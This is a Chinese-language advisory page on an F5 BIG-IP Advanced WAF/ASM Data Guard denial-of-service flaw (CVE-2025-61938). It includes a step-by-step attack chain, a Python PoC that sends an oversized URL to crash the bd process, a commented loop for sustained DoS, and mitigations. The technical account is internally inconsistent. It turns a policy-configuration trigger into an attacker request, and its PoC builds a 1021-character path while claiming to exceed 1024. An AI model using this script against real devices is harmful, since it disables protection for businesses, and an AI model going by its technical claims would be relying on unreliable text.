CVE-2025-61938 F5 BIG-IP Advanced WAF Data Guard拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-61938

漏洞类型

拒绝服务（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP Advanced WAF / ASM

漏洞概述

CVE-2025-61938是F5 BIG-IP Advanced WAF（Web应用防火墙）和ASM（应用安全管理器）模块中的一个高危拒绝服务漏洞。该漏洞源于Data Guard Protection Enforcement（数据保护执行）功能在处理超长URL时的缺陷。当安全策略中配置的URL长度超过1024个字符时，无论是通过手动配置还是通过自动Policy Builder生成的策略，都会触发bd（bigd守护进程）的反复终止，导致安全策略失效，WAF/ASM防护功能不可用。

该漏洞的CVSS评分为7.5，属于高危级别。攻击者无需认证即可通过网络远程利用此漏洞，且不需要用户交互。虽然漏洞不会导致机密性泄露或数据完整性破坏，但其对系统可用性的影响为高（Availability: High），意味着攻击者可以通过持续发送恶意请求使WAF/ASM防护功能完全瘫痪，从而使受保护的业务系统暴露在各种Web攻击之下。

值得注意的是，F5官方明确说明已达到技术支持终止（EoTS）阶段的软件版本不再进行评估，因此使用旧版本的用户应特别关注此漏洞的影响。F5 BIG-IP作为企业级应用交付控制器（ADC），广泛部署在大型企业的关键业务系统中，一旦WAF防护功能失效，可能导致严重的业务中断和安全风险。

技术细节

F5 BIG-IP的Advanced WAF和ASM模块中的Data Guard Protection Enforcement功能负责检测和阻止HTTP响应中敏感数据（如信用卡号、社会安全号等）的泄露。该功能在解析和处理安全策略中的URL配置时存在缓冲区处理缺陷。

漏洞的根本原因在于：当安全策略中配置的URL长度超过1024个字符时，bd进程在处理该策略时未能正确执行边界检查，导致进程异常终止。由于bd进程负责执行WAF/ASM的安全策略，一旦该进程反复崩溃，整个WAF/ASM防护功能将无法正常工作。

攻击者可以通过以下方式利用此漏洞：
1. 构造一个HTTP请求，其中包含指向目标BIG-IP系统的恶意URL
2. 该URL需要满足以下条件：a) 长度超过1024个字符；b) 触发Data Guard Protection Enforcement策略的匹配
3. 当bd进程处理该请求时，会因缓冲区溢出或类似的内存错误而崩溃
4. 攻击者可以持续发送此类请求，使bd进程反复崩溃重启，最终导致WAF/ASM完全不可用

由于该漏洞的CVSS向量为AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H，表明攻击完全通过网络进行，攻击复杂度低，无需任何权限或用户交互，且直接导致系统可用性丧失。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过扫描或信息泄露发现目标F5 BIG-IP设备的IP地址和端口，确认其运行Advanced WAF或ASM模块，并识别Data Guard Protection Enforcement策略所保护的URL路径模式。

STEP 2

步骤2：构造恶意请求

攻击者构造一个HTTP GET请求，其中URL路径长度超过1024个字符，且路径匹配目标BIG-IP上配置的Data Guard Protection Enforcement安全策略。

STEP 3

步骤3：发送恶意请求

攻击者通过网络向目标BIG-IP设备发送构造好的恶意HTTP请求。由于无需认证（PR:N）且无需用户交互（UI:N），攻击可以完全自动化进行。

STEP 4

步骤4：触发bd进程崩溃

当bd（bigd）进程接收到该请求并尝试处理Data Guard策略时，由于URL长度超过1024字符的边界检查缺陷，bd进程因内存错误而异常终止。

STEP 5

步骤5：持续拒绝服务

攻击者持续发送恶意请求，使bd进程反复崩溃重启，最终导致WAF/ASM防护功能完全失效，受保护的业务系统失去Web应用防火墙保护。

STEP 6

步骤6：后续攻击

在WAF/ASM防护失效后，攻击者可以进一步利用其他Web攻击手段（如SQL注入、XSS等）直接攻击后端业务系统，因为已无WAF防护。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-61938 - F5 BIG-IP Advanced WAF/ASM Data Guard DoS PoC
# This PoC demonstrates how to trigger the bd process crash by sending
# an HTTP request with a URL longer than 1024 characters that matches
# a Data Guard Protection Enforcement policy.

import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "https://target-bigip.example.com"
TARGET_PORT = sys.argv[2] if len(sys.argv) > 2 else 443

# Construct a URL longer than 1024 characters
# The URL path needs to match a configured Data Guard policy pattern
long_path = "/" + "A" * 1020  # 1021 characters total

# Build the full URL
target_url = f"{TARGET_HOST}:{TARGET_PORT}{long_path}"

print(f"[*] Targeting: {TARGET_HOST}")
print(f"[*] Sending request with URL length: {len(long_path)} characters")

# Send the malicious request
try:
    response = requests.get(
        target_url,
        verify=False,
        timeout=10,
        headers={
            "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-61938-PoC)",
            "Accept": "*/*",
            "Connection": "close"
        }
    )
    print(f"[*] Response status: {response.status_code}")
    print(f"[*] Response length: {len(response.content)}")
    print("[+] Request sent successfully. Check if bd process has crashed.")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
    print("[*] Connection failure may indicate bd process crash.")

# For continuous DoS attack, uncomment the following loop:
# while True:
#     try:
#         requests.get(target_url, verify=False, timeout=5)
#     except:
#         pass

影响范围

F5 BIG-IP Advanced WAF < 修复版本

F5 BIG-IP ASM < 修复版本

所有已配置Data Guard Protection Enforcement且URL超过1024字符的策略版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查所有WAF/ASM安全策略，将Data Guard Protection Enforcement中配置的URL长度限制在1024字符以内；2）如果业务允许，可以暂时禁用Data Guard Protection Enforcement功能；3）通过防火墙规则限制对BIG-IP设备的异常长URL请求；4）使用iRule对进入的HTTP请求进行URL长度检查，拒绝超过1024字符的请求；5）密切监控bd进程状态，设置告警以便及时发现异常。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61938
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61938
3 Details https://www.cvedetails.com/cve/CVE-2025-61938/
4 VulDB https://vuldb.com/cve/CVE-2025-61938
5 Link https://my.f5.com/manage/s/article/K000156624